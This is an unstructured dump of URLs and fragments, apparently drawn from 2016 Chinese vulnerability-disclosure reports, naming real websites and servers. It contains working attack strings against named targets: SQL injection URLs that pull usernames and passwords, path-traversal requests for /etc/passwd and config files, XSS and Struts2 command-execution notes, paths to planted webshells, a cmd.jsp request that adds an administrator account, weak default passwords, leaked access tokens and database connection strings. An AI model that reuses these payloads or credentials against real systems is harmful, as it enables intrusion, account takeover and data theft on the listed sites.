http://m.rrs.com/ http://123.***.***.***:47088/essframe www.comsenz-service.com http://wuhan.wandamoviepark.com/ http://query.hex.wanmei.com/card/search?rarties=1,2&rule=1&type= http://oa.puxinasset.com/pxoec/admin/login.action存在struts2命令执行 http://oa.puxinasset.com/pxoec/woo.jsp http://jdgc.dept.ccut.edu.cn/pic.asp?id=919&w=2&s_hh=200 http://login.sina.com.cn/sso/login.php?su=ZnNkZnNkZicvPg0KPHNjcmlwdD4NCmFsZXJ0KC94c3MvKTsNCjwvc2NyaXB0Pjwn&sp=&encoding=UTF-8&returntype=META http://login.sina.com.cn/sso/login.php?url=http%3A%2F%2Fweibo.com%2F&gateway=1&service=miniblog&entry=miniblog&useticket=1&returntype=META&_client_version=0.6.14 http://passport.weibo.com/wbsso/login?url=http%3A%2F%2Fweibo.com%2F&ticket=ST-*****-1459053552-xd-5025***98696******922F1*30E&retcode=0 http://gd.qq.com/zt2015/clxyy/index.htm www.jjlwd.com http://www.jjlwd.com/mobile/appService.do http://www.jjlwd.com/mobile/appService.do www.jjlwd.com www.zugame.com http://webcache.googleusercontent.com/search?q=cache:IDhqSoxR910J:blog.devbook.cn/815187/article/20+&cd=1&hl=zh-CN&ct=clnk&gl=cn http://m.yicp.com/ http://bolt.jebe.renren.com/bolt/member/city.htm?provinceCode=0086130000000000 http://228pw.com/piao.asp?sclass=1” http://228pw.com/piao.asp?sclass=1” http://**.**.**.** http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=view&filename=Li4vLi4vLi4vLi4vLi4vLi4vd2luZG93cy93aW4uaW5p http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=view&filename=Li4vLi4vZGF0YS9hZG1pbnVzZXIuY2Zn http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=sharelink&filename=Li4vLi4vd2VibWFpbC90ZW1wL19zZXNzaW9ucw== http://**.**.**.**:6080/viewsharenetdisk.php?userid=postmaster&opt=sharelink&filename=Li4vLi4vZGF0YQ== https://118.145.2.40:4850 https://118.145.2.41:4848 https://118.145.2.41:4850 https://118.145.2.42:4848 https://118.145.2.42:4850 https://118.145.2.44:4848 https://118.145.2.44:4850 https://appupload.fenxiangplus.cn:4848 
http://118.145.2.41:7031/share_backend/login.html http://www.okdai.com/ FF3BCFEEB5FC0CF153C9245589ACCC92:FG=1 email:bsharesync www.okdai.com http://shop.aigame100.com/list/list.aspx?Types=1 http://www.cnfeol.com/jpgrotatorxml.aspx?cid=mengtie_default http://mai.damai.cn/gallery-ajax_get_goods.html www.zjykrc.com http://www.sanjialiu.com/ http://www.sanjialiu.com/UCenter/MyAddressEdit?aid=5525 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/cgi-bin/web_cgi_main.cgi http://**.**.**.**/v2/index.html http://**.**.**.**/N.aspx http://**.**.**.**/mobctgettianqi http://**.**.**.**/mobctgettianqi http://www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637 http://www.henxinht.com。 http://www.henxinht.com/lates/index.html http://www.henxinht.com/lates/index.html?username=123%27/**/and/**/%28seleselectct/**/1/**/from/**/%28selselectect/**/count%28*%29,concat%280x7e,user%28%29,0x7e,floor%28rand%280%29*2%29%29x/**/from/**/information_schema.tables/**/group/**/by/**/x%29a%29%23_ http://android.myapp.com/myapp/detail.htm?apkName=com.okdai http://app.okdai.com/api/Account/BankList http://club.dxy.cn/littmann/rank/top/3 http://club.dxy.cn:80/littmann/rank/top/3 http://socks.ustack.com http://jira.ustack.com http://project.ustack.com https://www.ustack.com http://zabbix.ustack.com http://bbs.c.163.com/signin/ coding:utf-8 http://**.**.**/phpmyadmin/_ http://sso.auxgroup.com/login http://oa.g5air.com/ http://**.**.**.**:9999/main/login.asp?errMsg=1 http://house.baidu.com:80/bj/pricetrend/dataflash/%E6%B5%B7%E6%B7%80/ http://house.baidu.com:80/bj/pricetrend/dataflash/%E6%B5%B7%E6%B7%80/ http://www.papajohnschina.com/online/index.jsp?lang=zh_CN http://www.papajohnschina.com/ccbs/ccbs/appupdate/appUpdateMain.jsp http://www.papajohnschina.com/ccbs/ http://www.papajohnschina.com/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=908340 http://eproc.presidentofnepal.gov.np/minutes_detail.php?tid=11 http://**.**.**.**.np//minutes_detail.php?tid=11 
http://**.**.**.**.np//minutes_detail.php?tid=11 http://edudbc.gov.np//minutes_detail.php?tid=11 http://eproc.dor.gov.np//minutes_detail.php?tid=11 http://**.**.**.**.np/ebid//minutes_detail.php?tid=11 http://eproc.presidentofnepal.gov.np/minutes_detail.php?tid=2 http://eproc.presidentofnepal.gov.np/minutes_detail.php?tid=2 https://gw-m.sino-life.com/SL_MAS/mas/appPost.do site:www.chinaexpressair.com http://www.chinaexpressair.com/forpay_2015112527750.html http://www.chinaexpressair.com/HXHK/forpay_2015112227458.html http://www.chinaexpressair.com/HXHK/forpay_2016010131724.html http://www.chinaexpressair.com/forpay_2016012836719.html www.chinaexpressair.com http://love.dangdang.com/mg.php/main/addintronum?id=59&type=KOL site:np.etcp.cn http://np.etcp.cn/withdrawalBill/billing?autoid=ci3NoJP1g4U=&condition=2&isMantual=false&persion=wjsctcc&persionid=1350&isclass=0&roleid=22&realpersion=%E9%99%88%E6%BA%90 http://**.**.**.**:7021/ http://tes.chinatelling.com/ http://tes.chinatelling.com:8080/ http://tes.chinatelling.com:8080/is/index.jsp http://bid.dongyuechem.com http://bid.dongyuechem.com/Products/Tiens/CategoryStockView.aspx?id=1 https://**.**.**.**/coca1ne/DLL_Hijacker http://**.**.**.**/upload/image/201603/2016032814554724178.gif http://114.141.189.2/load.htm http://140.207.160.130/load.htm http://www.zihexin.net/brand/offersinfor.do?action=4&ID=540055 http://www.zihexin.net/client/unit.do?method=info&STORE_ID=4000105444100022 http://**.**.**.**:7001/defaultroot/work_flow/formOptJSPUpload.jsp http://**.**.**.**:7001/defaultroot/work_flow/test.jsp http://**.**.**.**:7001/defaultroot/work_flow/test2.jsp http://www.jinshangdai.com/user/findpwd.html http://219.143.202.137:8080/notice/searchNotice.action?categoryId=9639398 http://219.143.202.137:8080 http://cp.iciba.com/android/ www.tianshijie.com.cn http://www.tianshijie.com.cn 
http://comment.10jqka.com.cn/comment_v2.php?seq=1970*&startnum=0&getnum=5&jsoncallback=jQuery17207547062449157238_1459159739394&type=hot&_=1459159739435 http://www.webpowerchina.com:80/ http://www.t-rex.cn/artInfo.php?id=131 http://113.204.104.235/aspx/ch/Search.aspx?key=1 http://cspp.10jqka.com.cn/common/feedback/index/ http://vis.10jqka.com.cn/management/cspp/feedback/index/ http://123.127.198.90/console/ http://123.127.198.90/f/test1.jsp http://hanjie.team.ccut.edu.cn/pic.asp?id=525&s_hh=200&w=2 http://sms.voole.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://wap.voole.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://**.**.**/_ http://**.**.**/script_ www.cnbl***** http://online.bizconf.cn/sys-login!customPage.action http://www.t-rex.cn/about.php?id=30 http://quanzi.zbj.com/main/view-qid-10470*.html http://quanzi.zbj.com/main/view/qid-10456* http://210.13.127.93/login.htm http://116.228.223.197/login.htm http://track.chiaus.cn/SysAdmin/ url:http://120.37.90.23:9201/ url:http://120.37.90.23:9200/ http://www.baozun.com:81/ http://book.weibo.com/newcms/tp_p4c22t65.html这个页面中的分享处,不过今天我说过不报CSRF了,所以这次是一次反射型的XSS。 http://book.weibo.com/newcms/i/weibo_send.php index.php/login/user_login http://**.**.**.**:2080/pms-service/section/content_list?cache=true&id=1408&keywords=APM&limit=18&portalId=14&start=0 http://**.**.**.**/en-us/support/search?query=aaa{{111%2b111}}bbb&xstart=8 http://dict-mobile.iciba.com/msg/index.php?act=ios&starttime=8&endtime=21&token=%3Cc2ea4faa+dc329a34+0b700118+74422130+fcb6fce5+ef1e1a09+16924da4+51f1a81d%3E&type=111&uid=×tamp=1459182467&client=3&sourceId=2&uuid=49A04CE5-A935-429A-BFEB-EF3BE0051529&v=8.3&sv=iPhoneOS9.3 http://lanxiniu.com/ https://github.com/eggfly/SAEProjects/blob/ca6b83abb59d2b2b39a0f24e4efda466325716c8/smsender/.svn/pristine/58/58a095cdf3cdce382bebf1411e65162362329718.svn-base 
http://esaytouch.app.jj.cn:8080/data/zip/page/querylanguagethemes?package_name=com.shere.assistivetouch&sort=-1&begin=-1&version_code=40506&language=cn&channel=xiaomi http://www.jiuxindai.com/) http://www.gold-shop.cn/ http://202.104.113.190/ http://202.104.113.190/distribution/ListVRetailDetail.do http://202.104.113.190 http://sns.maimaicha.com/company/guowai?category=baicha_ccs&page=102 http://www.easily-china.com/,图中链接存在漏洞 http://14.29.84.51:8080/system/login.action;jsessionid=E2EF2635C60A1F1C132038537D772C3A存在命令执行漏洞 http://**.**.**.**:8888/NEWEGSS/ http://**.**.**.**:8888/EGSS_User/ http://**.**.**.**:8888/EGSS_User/loginAction!login.action http://**.**.**.**:8888/EGSS_User/test.jsp http://**.**.**.**:8681/ http://**.**.**.** http://**.**.**.**:8888 http://**.**.**.**:8190 http://**.**.**.**:8080 http://**.**.**.**:8888 http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://exp.zjxpp.com:8186/basisPlatform/loginAction!login.jspa http://hr.zjxpp.com:8186/basisPlatform/ http://exp.zjxpp.com:8186/examples/jsp http://exp.zjxpp.com:8186/examples/jsp/abc.jsp https://**.**.**.**/login https://passport.weibo.cn/forgot/forgot?entry=wapsso&from=0&vt=4 https://security.weibo.com/iforgot/setpwd?rand=一串hash https://security.weibo.com/iforgot/setpwd?rand=109c6538e90950669fca7b3ea310b633 http://www.chinazyjr.com/index.php?m=index&c=contactus&a=fileDown&pdfname=../../../etc/passwd http://www.chinazyjr.com/index.php?m=index&c=contactus&a=fileDown&pdfname=/application/config/database.php http://www.ivd-express.com/user/toHomeUI http://**.**.**.**/help.jspx jdbc:oracle:thin:@**.**.**.**:1521:orcl lady.mop.com/news/bencandy.php?fid=47&aid=908 http://115.159.56.188/admin/index.action jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK 
http://bracelet-10003817.image.myqcloud.com/d90f65ce-5b0f-4cef-b426-96b3ace08925 http://bracelet-10003817.image.myqcloud.com/edfe890e-068e-44f7-9519-160c2511cd1c BIZ_USER_ID:8a035cb45383be4b0153a27177580363 http://bracelet-10003817.image.myqcloud.com/d90f65ce-5b0f-4cef-b426-96b3ace08925 http://219.142.54.176:9003/console/ http://219.142.54.182:8003/console/ http://219.142.54.178:8003/console/ http://123.127.198.92:7003/console/ http://ebusiness.minshenglife.com:8003/console/ http://monitor.bnu.edu.cn/graph_view.php?action=tree&tree_id=27 http://mrtg.bnu.edu.cn/ http://mail.okdai.com:8888/News/Search?id=7 http://web.95105899.com/silverfuture/live?roomid=90446472 http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1 https://vpn.crbank.com.cn http://121.14.65.92/ https://www.xiaoeyidai.com/?user&q=code/attestations/more https://www.xiaoeyidai.com/?user&q=code/attestations/list http://pss.csair.com/enableq/Android/FileUpload.php?optionID=1 php:a.jpg http://**.**.**.**/szpt/web/localpwd.jsp http://**.**.**.**/szpt/web/localpwd.jsp https://www.5aitou.com/register.htm http://wap.tianshijie.com.cn/appindex/index http://wap.tianshijie.com.cn/appindex/index http://121.14.6.93:8001/login.asp http://**.**.**.** http://**.**.**.**/mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,version%28%29%29,1%29 http://**.**.**.** http://**.**.**.**/mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,user%28%29%29,1%29 http://**.**.**.** http://**.**.**.**/mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,user%28%29%29,1%29 http://dzswsw.yxk.ccut.edu.cn/pic.asp?id=468 http://m.rrs.com/snaplb/wikiManage/queryWikiContentList?moduleId=3&oneLevel=1&pageSize=9 http://123.125.123.26:8080 
http://ir.361sport.com/html/ir_ann.php?year=2013 https://ksvpn.kingsoft.com/dana-na/auth/url_2/welcome.cgi https://ksvpn.kingsoft.com/,DanaInfo=admin.comment.iciba.com+index.php?mod=index&zid=14%27 www.iciba.com,成功访问,说明是可以访问的,但有些后台无法访问,但是也是个好消息。 https://github.com/wangxulin/portal_ops/blob/master/sites.json https://asset.ksops.com:8888 http://101.251.206.18:9080/nfsen/nfsen.php http://zabbix.liebaopay.com:9080/zabbix/dashboard.php http://manage.123.ksops.com http://101.251.206.18:9080/nfsen/nfsen.php https://mail.google.com/a/conew.com/#inbox http://211.157.162.253/ https://github.com/Jazzylol/learn/blob/853da337f5c484863ef33c86d750c8ec6e8293ad/HardWorking/src/main/java/learn/mail/WorkDaliyReport.java https://**.**.**.**/mer/ https://**.**.**.**/static/union/pages/index/index.html ftp://218.207.195.219:21 http://**.**.**.**/account/findPassword.html http://**.**.**.**/pjdetail/171386103482290176.html http://www.camel.com.cn/member/receive.aspx?receive_id=1000 http://www.camel.com.cn/member/receive.aspx?receive_id=10462 http://**.**.**.**/eap/ http://account.iqiyi.com/services/account/info.action?version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6&mix=1&testMode=0 http://**.**.**.**/wa/wa/ma3.jsp?o=index jdbc:oracle:thin:@**.**.**.**:1521:utsz http://**.**.**/loginfrom=%2f_ http://**.**.**/loginfrom=%2f_ root:/roo***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** bus:/:/***** owner:/d***** abrt:/sb***** daemon:/:/***** ntp:/sbi***** SSH:/var/empty***** aemon:/:/s***** User:/***** ver:/var/lib/ng***** www:/***** Bcast:10.105.63.25***** ff:fe1a:***** http://cg.wasuitv.com:5555/login.aspx http://demo2.chenengdai.com:8100/使用的是tomcat,意外的发现是若口admin/123456 http://m2.etongdai.com:7001使用的时weblogic,而且还发现了存在弱口令:weblogic/weblogic1 http://bcy.net/party/expo/post/detail/2422/19199 
http://www.10jqka.com.cn/gltface_for_lgt.php?uid=18554183 http://cosmetic.lady.163.com/ height:20px;BORDER http://helpdesk.app.jj.cn/api/chatMsg/receive?ks_uid=33615327&cid=87fc97afe901d296a56e601d099be083 http://erpview.5i5j.com/ http://whotel.jinjianginns.com/memberhubs1/order_show.htm?innerId=2076100 http://whotel.jinjianginns.com/memberhubs1/order_show.htm?innerId=2176100 http://whotel.jinjianginns.com/memberhubs1/order_show.htm?innerId=2000100 https://ifp.crbank.com.cn/cgi-bin/test-cgi encap:Ethernet F7:1D:4C:C0 addr:10.0.4.55 Bcast:10.0.4.255 Mask:255.255.255.0 f7ff:fe1d:4cc0/64 Scope:Link MTU:1500 packets:28142872 packets:13094815 http://api.huagu.com/answer/?page=1&pagesize=20 http://zyzc.com/yiti_more.php?Classid=19 http://zyzc.com/yiti_more.php?Classid=19&Cityid=&Mode=&pages= http://zyzc.com/yiti_more.php?Classid=19&Cityid=&Mode=&pages=2 http://zyzc.com/yiti_more.php?Classid=19&Cityid=&Mode=0 http://zyzc.com/yiti_more.php?Classid=19&Cityid=0 http://whotel.jinjianginns.com/ http://m.jinjianginns.com/ http://whotel.jinjianginns.com https://github.com/vspark/Python-scripts/blob/cc21c40777160fecaf3b1490a39f5bd666236be5/Python-study/sendemail.py http://**.**.**.**/ url:http://114.119.5.9/ http://114.119.5.9/mobile/support/appInfo/4.3.1?uid=1564470&appType=0 http://android.myapp.com/myapp/detail.htm?apkName=com.hexindai.hxd https://passport.bilibili.com/resetpwd/set?dopost=getpasswd&id=******&key=**************** https://**.**.**.**/vspark/Python-scripts/blob/cc21c40777160fecaf3b1490a39f5bd666236be5/Python-study/sendemail.py http://**.**.**.**/seeyon/main.do http://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31 http://helpdesk.app.jj.cn/api/user/login http://**.**.**.** http://14.215.133.167:8080/index.do http://14.215.133.168:8080/index.do http://14.215.133.167:8081/ http://**.**.**.** http://**.**.**.**/readme.txt http://**.**.**.**/ http://**.**.**.**/WriteWebService xmlns:i="http://**.**.**.**/2001/XMLSchema-instance 
xmlns:d="http://**.**.**.**/2001/XMLSchema xmlns:c="http://**.**.**.**/soap/encoding/ xmlns:v="http://**.**.**.**/soap/envelope/ http://**.**.**.**/ http://**.**.**.**/bbs.zip http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/ http://admin.1jiajie.com/v2/ http://www.ttkdex.com.hk/Page/CustomService/SiteMsg.aspx https://security.weibo.com/iforgot/setpwd?rand=xxx&v=xxx https://security.weibo.com http://www.jkwin.com.cn/ http://120.132.50.71:3306 www.lijiejie.com/xss.js www.lijiejie.com http://admin.wxb.com/index/feedback?page=1&is_replied=0 http://admin.wxb.com/index/feedback?page=1&is_replied=0 http://xz.giant.com.cn/upfile/ http://xz.giant.com.cn/upfile/dm.aspx http://xz.giant.com.cn/upfile/2014.aspx http://tplhksps.cntaiping.com/console/ http://tplhksps.cntaiping.com/f/test1.jsp jdbc:oracle:thin:@**.**.**.**:1521:ESSDEMO jdbc:oracle:thin:@**.**.**.**:1521:INDEDEMO xmlns:i="http://**.**.**.**/2001/XMLSchema-instance xmlns:d="http://**.**.**.**/2001/XMLSchema xmlns:c="http://**.**.**.**/soap/encoding/ xmlns:v="http://**.**.**.**/soap/envelope/ http://**.**.**.** n0:in0 xmlns:n0="http://**.**.**.** www.line0.com/ http://backend.line0.com/so/gotodetail.do?orderId=5992501&_=1459420689653 http://gjjm.zt.ccut.edu.cn/pic.asp?id=532&s_hh=200&w=1 http://office.lbxdrugs.com/seeyon/index.jsp bbc.taikang.com/QueryServlet http://docc.transgd.com.cn:7002 http://**.**.**.**/.svn/entries http://**.**.**.**/qqconnect/.svn/entries http://oms.bolo.me/ http://p.qq.com/s/FaaaElIL http://qt.vnnp.win/zfbwap/alipay http://a.zhanjds.com/qqwap/admin_页面 postgresql://58.220.5.143:7893 URL:http://try.fashion.sina.com.cn/home/api/?s=front&ie=utf-8&a=search&keyword=1&type=user&page=1&size=5&callback=HWFTypeBSTART&_=1459432378564 http://gmm.sdo.com/api/accountapi/goods?app_version=2.2.0.33&method=GetMyGoodsList¶ms=%7B%22goods_types%22%3A%220*%22%2C%22page%22%3A1%2C%22state%22%3A1%7D&src_code=8 
http://gmm.sdo.com/api/accountapi/goods?src_code=8&app_version=2.2.0.33&method=GetMyGoodsList¶ms=%7B%22state%22:0,%22goods_types%22:%2210,12%22,%22page%22:1%7D https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=2&formdir=1 http://182.92.105.50 http://182.92.105.50/zt-b.zip https://github.com/heroliu/Landscape/blob/f87d185610c84f68ef3c031e049cdd302606e5cf/testng.xml http://confluence.patsnap.com http://lx.leju.com http://lx.leju.com:80/tongji/lixiangtj?city=2&moban=&type=1&form_id=9 vpn.leju.com/admin web:http://10.207.0.180/ http://10.207.0.180/checkpwd.asp?ji=5&password=g00dPa%24%24w0rD&UserName=1 http://tthaofang.com/ http://**.**.**/bugs/wooyun-2016-0190700 https://**.**.** http://**.**.**/loginfrom=%2F_ https://**.**.**/prx/000/http/localhost/login/index.html_ http://**.**.**/_ http://**.**.** http://**.**.**/obrqemwn/index.jsp_ http://main.appstore.vivo.com.cn/rec/newapps?nt=WIFI&u=-57806365&;model=vivo+Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=2&av=19&cs=0&s=2%7C3511262971 https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=site%3Ayun.baidu.com%20NearMe%20%E4%B8%AA%E5%88%86%E4%BA%AB&oq=site%3Ayun.baidu.com%20NearMe%20%E4%B8%AA%E5%88%86%E4%BA%AB&rsv_pq=fd75ab7600009c7e&rsv_t=92b20H7sCx6nQdjBqcAjZFOTZc5hVt0g9Nl0mUUER9C2i2r6CWRaA93Bdw4&rsv_enter=0 http://news.leju.com/api/data/gettaglists?category=1*&callback=_1459476097316824 http://news.leju.com/tag/ http://www.jinlinbao.com/?list_con/lm/222/id/-77%20union%20select%201,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,password%29,13,14,15,16,17%20from+mx_user%20limit%201,1.html root:jlb20150123 http://www.jinlinbao.com/jlb http://www.jinlinbao.com/asset/mxupload/up0352604001459443106.php Name:admin Pass:admin http://121.14.65.123:8080/ 
https://**.**.**.**/oauth2/sso_authorize?client_id=2504490989&access_token=2.00_i6lvBv1Vc_Gd787877bd3V4v2kD&redirect_uri=http%3A%2F%2F**.**.**.**%2Fauth%2Flogin_success%2F&display=mobile&response_type=token&disable_sinaurl=1 http://**.**.**.**/spsp/login.do https://api.weibo.com/oauth2/sso_authorize?client_id=2504490989&access_token=2.00_i6lvBv1Vc_Gd787877bd3V4v2kD&redirect_uri=http%3A%2F%2Fapi.snssdk.com%2Fauth%2Flogin_success%2F&display=mobile&response_type=token&disable_sinaurl=1 http://yun.netentsec.com http://yun.netentsec.com/main/index/activation?from=ACTIVE_BY_URL&action=activation&t=3dce3f511744e6dbc649912325b7a118 http://180.76.169.198/baidu91/ http://180.76.169.198/baidu91/baidu91_charge.rar https://api.weibo.com/oauth2/sso_authorize?client_id=2504490989&access_token=2.00_i6lvBv1Vc_Gd787877bd3V4v2kD&redirect_uri=http%3A%2F%2Fapi.snssdk.com%2Fauth%2Flogin_success%2F&display=mobile&response_type=token&disable_sinaurl=1 http://yuedu.xunlei.com/?action=lists&cid=3&typeid=1 http://yuedu.xunlei.com/?action=lists&cid=3&typeid=1 http://www.saikr.com http://tangyuan.tom.com/ http://tangyuan.tom.com/redeem/gamecard.php http://yx.jinlianchu.com/.svn/entries http://monkey.zhanqi.tv/admin/#/access/login https://github.com/booleguo/sam-elle/blob/0b0684391a3bfd8df4b2e81535d370bdd87bdfc9/src/main/java/com/sam/yh/common/msg/UmsClientUtils.java http://gd.ums86.com:8899/sms/Api/Send.do http://j.m.leju.com/login http://**.**.**.**,有多家分公司 http://**.**.**.**/bugs/wooyun-2010-0134587 http://tong.duowan.com http://tong.duowan.com/userweb/faq_data_backup/201604/a.php http://**.**.**.**,有多家分公司 http://**.**.**.**/bugs/wooyun-2010-0134587 http://**.**.**.**/user_findpwd.php?t=email http://**.**.**.**/user_findpwd.php?t=doemail www.66666666.com http://3g.emaotai.cn/ uid:2183570524,微博小秘书uid:1642909335 http://direct.wap.zol.com.cn/ipj/readCalender/uploadRecord/ http://direct.wap.zol.com.cn/ipj/readCalender/uploadRecord http://beian.21vianet.com/sys/randomImg.action 
http://beian.21vianet.com/bak.jsp http://phy.ujn.edu.cn/wwwroot.rar http://phy.ujn.edu.cn/guanlihoutai/index.asp http://jzlq.lakala.com:7070/pos/index.php?action=login http://dev.game.gionee.com/.git http://www.weibo.com/p/aj/proxy?api=url http://contentrecommend.mobile.sina.cn@123.57.73.3/wb.php之类的url已经不行了,但使用http://contentrecommend.mobile.sina.cn.fakedomain.com http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 http://**.**.**.**:812/login/Login.jsp?logintype=1 http://**.**.**.**:812/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 
http://**.**.**.**:18881/login/login.jsp http://**.**.**.**:18881/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=88%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1 https://xiaolvyun.baidu.com/ https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/1122/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2155/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2159/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/1076/edit?_=1459597042687 https://xiaolvyun.baidu.com/abc123/icafe//planAndTrack/2157/edit?_=1459597042687 https://xiaolvyun.baidu.com/portal/member/dashboard?enterpriseName=test https://xiaolvyun.baidu.com/abc123/icafe/issue/1/showHierarchy?_=1459598259235 https://xiaolvyun.baidu.com/portal/member/dashboard?enterpriseName=iKafe http://123.196.123.21:8080/user/login.jsp http://123.196.123.21:8010/uddiexplorer/sss.jsp http://123.196.123.21:8010/uddiexplorer/out.jsp http://imo.iflytek.com/file/NDisk/write.php http://**.**.**.**/logon.jsp http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://**.**.**.**/UserUpLoadFiles/Image/1111111118566090681/info.jsp http://**.**.**.**/general/vmeet/wbUpload.php?fileName=test.php+ http://**.**.**.**/general/vmeet/wbUpload/test.php localhost:3306 http://dpp.dangdang.com http://dpp.dangdang.com http://wooyun.org/bugs/wooyun-2016-0191864这个漏洞,就可以实现获取用户的Cookie,转发指定的微博,从而实现扩散式的传播。 index.php/payrecord/ index.php/login/user_login a4:3d:78:a0:3d:da","curr_version":"0","mac_addr":"1*","wk_password":"e","login_type":"wk_no www.weimob.com主站服务器: 
http://59.151.22.134/.svn/entries没设权限 http://59.151.22.134/i.php http://www.t.com http://home.t.com http://passport.t.com https://10.102.34.116:8443 http://i.t.com http://p.t.com http://img.t.com http://p01.t.com http://p02.t.com http://p03.t.com http://android.t.com http://img01.t.com http://corp.t.com http://wuliu.t.com http://ms.t.com:8880 http://pic.t.com http://search.t.com http://searchaddr.t.com http://sfvweb.sf-express.com/index.php?app=yxservicesoap&action=require_action http://10.103.16.18 http://cart.t.com http://10.102.36.175:8081 http://10.102.34.113:8080 http://m.sfbest.com http://fd.t.com/ http://stockservice.t.com http://activityservice.t.com http://orderapi.t.com:8080 http://10.102.36.151:8080 http://10.102.36.151:8088 http://10.102.36.151:8058 http://10.103.16.104:8010 http://10.102.36.183:8080 http://oa.asiainfo.com/console/login/LoginForm.jsp http://oa.asiainfo.com/bea_wls_internal/shell.jsp?o=vLogin jdbc:oracle:thin:@10.1.1.89:1521:prod TNS:listener http://211.152.48.115/login/index.xht http://pwccn.com/home/eng/rcs_info_security_2016.html?Category=PC&CategoryTitle=More%20contacts&MorePage=1 http://**.**.**.**/action/front/indexAction_prepareIndex http://**.**.**.**/SEMIS_DL/page/DoorPage/substance.aspx?action=aff&pId=1365176182 http://duiyi.sina.com.cn/iphone/news/news_view.htm?news_no=1551 http://www.10000kl.com/recharge/yeepay_recharge.asp http://www.jyceo.com/bd_lby.php?cid=65 http://www.ll7777.com/ http://www.ll7777.com/upload/201604/03/engout.php http://www.ll7777.com/upload/201604/03/Darkshell.php http://www.ll7777.com/index.php?r=order/create&sellId=151 http://weibo.com/ttarticle/p/show?id=2309403959482995611795 http://jiaoyuhuodong.pkufi.com/apply.php http://v2.mitime.com.cn/Conf/jsp/systembulletin/bulletinAction.do?operator=details http://v2.mitime.com.cn/cmd.jsp?cmd=net%20localgroup%20administrators%20wooyun%20/add http://180.97.187.30:8080/AdminMgr/backup/databackup.jsp http://192.168.100.4:3306|0|0 http://www.bestfenqi.com/ 
